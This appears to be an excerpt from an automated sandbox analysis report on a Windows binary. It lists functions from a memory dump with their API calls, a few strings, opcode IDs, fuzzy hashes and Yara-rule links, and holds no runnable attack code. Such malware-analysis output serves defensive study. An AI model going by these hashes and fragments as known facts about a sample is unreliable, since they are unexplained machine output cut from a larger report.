                                                                                • Instruction ID: 125a097a9f26af6413fbc01dcc411eb2579d6a3fd62fad3348166db73649eeaa
                                                                                • Opcode Fuzzy Hash: b40f1a29007ee88b205eab30251de60a7177f83a5dcce95581a050599bf5dc33
                                                                                • Instruction Fuzzy Hash: BF018EB294021C75DB207B668C86ECF732CDF45358F1044BEB504E7182D9B88E888AA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00412270, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 004121C3: LoadLibraryW.KERNEL32(shell32.dll,0040E314,00000000,?,00000002), ref: 004121D1
                                                                                  • Part of subcall function 004121C3: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 004121E6
                                                                                • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 004122AA
                                                                                • memset.MSVCRT ref: 004122C9
                                                                                • RegCloseKey.ADVAPI32(?), ref: 00412330
                                                                                • wcscpy.MSVCRT ref: 0041233E
                                                                                  • Part of subcall function 00407674: GetVersionExW.KERNEL32(00450DA8,0000001A,00412291), ref: 0040768E
                                                                                Strings
                                                                                • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 004122E4, 004122F4
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.704959597.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressCloseFolderLibraryLoadPathProcSpecialVersionmemsetwcscpy
                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                • API String ID: 2699640517-2036018995
                                                                                • Opcode ID: c9c64e8e2f051e8caefe2aaada980519e2fc3c71178caf599d8c015b906c46d2
                                                                                • Instruction ID: c2720df25ff2a98c700ebd4409fa2125fd2182e4a6debc52b8ada4298b6a052e
                                                                                • Opcode Fuzzy Hash: c9c64e8e2f051e8caefe2aaada980519e2fc3c71178caf599d8c015b906c46d2
                                                                                • Instruction Fuzzy Hash: 29110831800114BAEB24E7599E4EEEF737CEB05304F5100E7F914E2151E6B85FE5969E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00411140, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,004112EE,?,?,?,?,?,00000000,?), ref: 00411151
                                                                                • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 0041116B
                                                                                • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,004112EE,?,?,?,?,?,00000000,?), ref: 0041118E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.704959597.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProcProcessTimes
                                                                                • String ID: GetProcessTimes$kernel32.dll
                                                                                • API String ID: 1714573020-3385500049
                                                                                • Opcode ID: 464f22052b3d8a0ba402789ad02750f959a9c2b374b1230dcbafe23b26c1554b
                                                                                • Instruction ID: be5b0e9885743e8d30da273d8ef78610b28524ab18dcfae55e11e98fa027414b
                                                                                • Opcode Fuzzy Hash: 464f22052b3d8a0ba402789ad02750f959a9c2b374b1230dcbafe23b26c1554b
                                                                                • Instruction Fuzzy Hash: 4FF01C35104308AFEB128FA0EC04B967BA9BB08749F048425F608C1671C775C9A0DF58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040E0AC, Relevance: 7.6, APIs: 5, Instructions: 64windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040E0CE
                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040E0F7
                                                                                • DeleteObject.GDI32(?), ref: 0040E129
                                                                                • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,00000000,0040E36A), ref: 0040E171
                                                                                • LoadIconW.USER32(00000000,00000065), ref: 0040E17A
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.704959597.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ??2@$DeleteHandleIconLoadModuleObject
                                                                                • String ID:
                                                                                • API String ID: 659443934-0
                                                                                • Opcode ID: 5c24b57fa0e1cfdf7f3906394f540e2e73f2d4ee2212ac106c4666ba6c8c482e
                                                                                • Instruction ID: 1cba439d4a63bd06fd13ecdd31e81b6a0d9710d4e5327182bdbee0994cb59d35
                                                                                • Opcode Fuzzy Hash: 5c24b57fa0e1cfdf7f3906394f540e2e73f2d4ee2212ac106c4666ba6c8c482e
                                                                                • Instruction Fuzzy Hash: 322193B19012989FDB30EF768C496DEB7A9AF84715F10863BF80CDB241DF794A118B58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0043800C, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 967COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                • only a single result allowed for a SELECT that is part of an expression, xrefs: 004380DE
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.704959597.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memset
                                                                                • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                • API String ID: 2221118986-1725073988
                                                                                • Opcode ID: fea911689c87fcb8dadeea6a797f322e67ae447bf2e03149324d6587d0a0c1b4
                                                                                • Instruction ID: 9afff8ac9fdfbc15a9c7ae9a6e2295b57ef319e934304d2411a679509b53bb08
                                                                                • Opcode Fuzzy Hash: fea911689c87fcb8dadeea6a797f322e67ae447bf2e03149324d6587d0a0c1b4
                                                                                • Instruction Fuzzy Hash: 36826971A00318AFDF25DF69C881AAEBBA1EF08318F14511EFD1597292DB79E841CB94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040E227, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 68COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.704959597.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _wcsicmp
                                                                                • String ID: /stext
                                                                                • API String ID: 2081463915-3817206916
                                                                                • Opcode ID: e7410df3178ec06b149dd267b323e01f272d5e4eb36cc30877f85b29a899849a
                                                                                • Instruction ID: 5da650caeba3f583edd317abe6dc9e2273d49bc4fc560570e2d9775ed52fc578
                                                                                • Opcode Fuzzy Hash: e7410df3178ec06b149dd267b323e01f272d5e4eb36cc30877f85b29a899849a
                                                                                • Instruction Fuzzy Hash: 37218170B00105AFD704FFAA89C1A9DB7A9BF94304F1045BEE415F7382DB79AD218B59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004161B0, Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memset.MSVCRT ref: 004161BB
                                                                                • GetSystemInfo.KERNELBASE(00451CE0,?,00000000,00440C34,00000000,?,?,00000003,00000000,00000000), ref: 004161C4
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.704959597.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InfoSystemmemset
                                                                                • String ID:
                                                                                • API String ID: 3558857096-0
                                                                                • Opcode ID: b2614796881ddab84da0c6407dc57915020354a4b010b0c78962ddc3b3495293
                                                                                • Instruction ID: 01e0680712ac90f889d23e176cd2934d89dbbab4f1fad96818c53916f6f4ffc6
                                                                                • Opcode Fuzzy Hash: b2614796881ddab84da0c6407dc57915020354a4b010b0c78962ddc3b3495293
                                                                                • Instruction Fuzzy Hash: D6E02230A0062067E3217732BE07FCF22848F02348F00403BFA00DA366F6AC881506ED
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00407144, Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,004421F7,00000000,?,00000000,00000000,00410671,?,?), ref: 00407156
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.704959597.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                • API String ID: 823142352-0
                                                                                • Opcode ID: 9a929023f2c627b70a1d779166e782d06c126c11e9800125383b8a94db93c5c6
                                                                                • Instruction ID: 81d2dec17d2b84b4128be66cdd24e97b0dbf61b8fa3bcd6fd5fd384be9d73f32
                                                                                • Opcode Fuzzy Hash: 9a929023f2c627b70a1d779166e782d06c126c11e9800125383b8a94db93c5c6
                                                                                • Instruction Fuzzy Hash: E4C092B0240201BEFF228B10ED16F36695CD740B01F2044247E00E40E0D1A04F108924
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040715D, Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040C5D7,?,?,00000000,00000001,?,?,?,0040E2DC), ref: 0040716F
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.704959597.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                • API String ID: 823142352-0
                                                                                • Opcode ID: b3d4b136a85312aa723e3c9e2acb5816e1c60966b2ab5dba606afdc82e084c94
                                                                                • Instruction ID: 6739adb68e03e12f7f7c1d8ccdc83ffe2e18cb8bef7d19e3acfe4a72d1b5eace
                                                                                • Opcode Fuzzy Hash: b3d4b136a85312aa723e3c9e2acb5816e1c60966b2ab5dba606afdc82e084c94
                                                                                • Instruction Fuzzy Hash: 49C092F02502017EFF208B10AD0AF37695DD780B01F2084207E00E40E0D2A14C008924
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004081EA, Relevance: 1.4, APIs: 1, Instructions: 127COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00407EB8: free.MSVCRT(?,00408225,00000000,?,00000000), ref: 00407EBB
                                                                                  • Part of subcall function 00407EB8: free.MSVCRT(?,?,00408225,00000000,?,00000000), ref: 00407EC3
                                                                                • free.MSVCRT(?,00000000,?,00000000), ref: 004082B2
                                                                                  • Part of subcall function 00408001: free.MSVCRT(?,00000000,?,004082EE,00000000,?,00000000), ref: 00408010
                                                                                  • Part of subcall function 00407475: malloc.MSVCRT ref: 00407491
                                                                                  • Part of subcall function 00407475: memcpy.MSVCRT ref: 004074A9
                                                                                  • Part of subcall function 00407475: free.MSVCRT(00000000,00000000,?,00408025,00000002,?,00000000,?,004082EE,00000000,?,00000000), ref: 004074B2
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.704959597.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: free$mallocmemcpy
                                                                                • String ID:
                                                                                • API String ID: 3401966785-0
                                                                                • Opcode ID: 2965bb17a7e0c771abc11c43702067ecb1f0b8c1624655e4732796e1fec34586
                                                                                • Instruction ID: 9a294873d4d6790ac16ff047b4da0d243ffe3cbd3c442eed78fe53e82fef6e86
                                                                                • Opcode Fuzzy Hash: 2965bb17a7e0c771abc11c43702067ecb1f0b8c1624655e4732796e1fec34586
                                                                                • Instruction Fuzzy Hash: 22513672D006099BCB10DF99C5804DEBBB5BB48314F60817FE990B7391DB38AE85CB99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00408037, Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • free.MSVCRT(00000000,00408352,00000000,?,00000000), ref: 0040803E
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.704959597.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: free
                                                                                • String ID:
                                                                                • API String ID: 1294909896-0
                                                                                • Opcode ID: b8cd1effcdf29b95293438428d1a83d87b736904a3019313e09548ab324a0620
                                                                                • Instruction ID: b2304b4461d9917b15a132db01dd128865174dbe20628525ae7b4e3248e143f9
                                                                                • Opcode Fuzzy Hash: b8cd1effcdf29b95293438428d1a83d87b736904a3019313e09548ab324a0620
                                                                                • Instruction Fuzzy Hash: 17C08CB24107018FF7308F11C905322B3E4AF0073BFA08C0EA0D0914C2DBBCD084CA08
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Non-executed Functions